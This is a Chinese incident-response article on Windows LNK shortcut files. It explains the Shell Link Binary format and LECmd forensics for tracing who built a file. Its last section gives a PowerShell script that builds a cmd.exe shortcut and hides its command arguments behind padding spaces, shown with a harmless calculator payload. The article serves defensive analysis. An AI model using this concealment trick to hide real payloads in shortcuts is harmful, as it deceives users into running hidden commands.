应急响应之Lnk文件分析

“ 

LNK是MicrosoftWindows用于指向可执行文件或应用程序的快捷方式文件的扩展名。LNK文件通常用于创建开始菜单和桌面快捷方式。“LNK”是“Link”的缩写，“.lnk”后缀即使勾选显示已知后缀名也会自动隐藏，而且该文件可以通过更改图标来伪装成合法文档。本文介绍LNK文件的Shell LinkBinary文件格式，并分析如何检测恶意的快捷方式 (LNK)。

”

01

—

Shell Link Binary

Shell Link Binary包含用于访问另一个数据对象的信息，文件扩展名为“.LNK”。目的是通过另一个对象访问数据对象，其存储了对目标数据对象的某种形式的引用。Shell link Binary由以下五部分组成：

SHELL_LINK_HEADER包含有关目标文件的关键信息、与该文件相关的属性以及其他结构，例如LinkFlags，用于标识其他可选标头（结构）的存在。例如，要使 LINKTARGET_IDLIST 结构存在，必须在LinkFlags 子结构中设置HasLinkTargetIDList属性。

**LINKTARGET_IDLIST，**如果在LinkFlags下设置HasLinkTargetIDList，LINKTARGET_IDLIST存储对文件系统上目标位置的引用，但该引用不是文件绝对路径（C:\test\1.txt），相反使用的是Windows Shell NameSpace，通过IShellFolder接口定位文件夹，每个文件夹或者文件都维护自己的ItemIDList，里面记录了它们的所有属性，比如文件名、类型、大小、修改时间。该IDList进一步封装在LinkTargetIdList结构中。

**LinkInfo，**如果在LinkFlags结构体中设置了HasLinkInfo，则会填充LinkInfo结构体，包含用于解析链接目标和标识其位置的信息，例如驱动器卷、序列号、标签和本地路径。

**StringData，**StringData部分主要由ShellLinkHeader中的LinkFlags结构控制，例如如果在LinkFlags中设置了HasWorkingDir和HasRelativePath属性，就能够在这个结构中看到链接目标的工作目录和相对路径。另一个重要的属性是HasArguments，它指定要执行链接的命令行参数。

ExtraData包含关于Lnk文件的所有补充信息。例如：

EnvironmentVariableDataBlock结构体可以查看Lnk文件的环境变量，

TrackerDataBlock可以帮助识别目标文件是否被复制或移动，还可以返回目标最后存在的MachineID(NetBIOS名称)和MAC地址等信息。

更多信息参见

https://docs.microsoft.com/zh-cn/openspecs/windows\_protocols/ms-shllink/747629b3-b5be-452a-8101-b9a2ec49978c

02

—

LEcmd

下载地址：https://github.com/EricZimmerman/LECmd

使用方法：

>LECmd.exe -f"C:\Users\Public\Desktop\Wireshark.lnk"

字段介绍：

Tracker database block 包含了攻击者机器的物理信息:

  Machine ID: desktop-0u9o925

  MAC Address: 00:0c:29:0d:92:4b

  MAC Vendor: VMWARE

  Creation: 2021-01-28 03:28:55

针对恶意的LNK类型文件，可以给我们提供LNK滥用方式，创建LNK的主机信息（如MAC，磁盘串号，主机名）等信息，这些信息对于样本溯源和提取同源样本来说十分有用。

03

—

构造恶意Lnk文件分析

一般情况下，攻击者会使用Lnk文件的命令行来实现一些恶意操作，例如：点击Lnk文件打开计算器

`$file = Get-Content "C:\Users\admin\Desktop\test.txt"``$blank_space = '      '``$WshShell = New-Object -comObject WScript.Shell``$Shortcut = $WshShell.CreateShortcut("C:\Users\admin\Desktop\test.lnk")``$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"``$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,22"``$Shortcut.Arguments = $blank_space + $file``$Shortcut.Save()`

注：通过修改$blank_space的空格数量可以实现隐藏payload参数

C:\Users\admin\Desktop\test.txt文件中写入/c start calc.exe

执行命令后生成的test.lnk文件格式如图，260个空格字符后面接着为payload代码

查看文件参数，显示如图，均被空格字符填充，payload成功隐藏

运行test.lnk，弹出计算器，payload成功执行。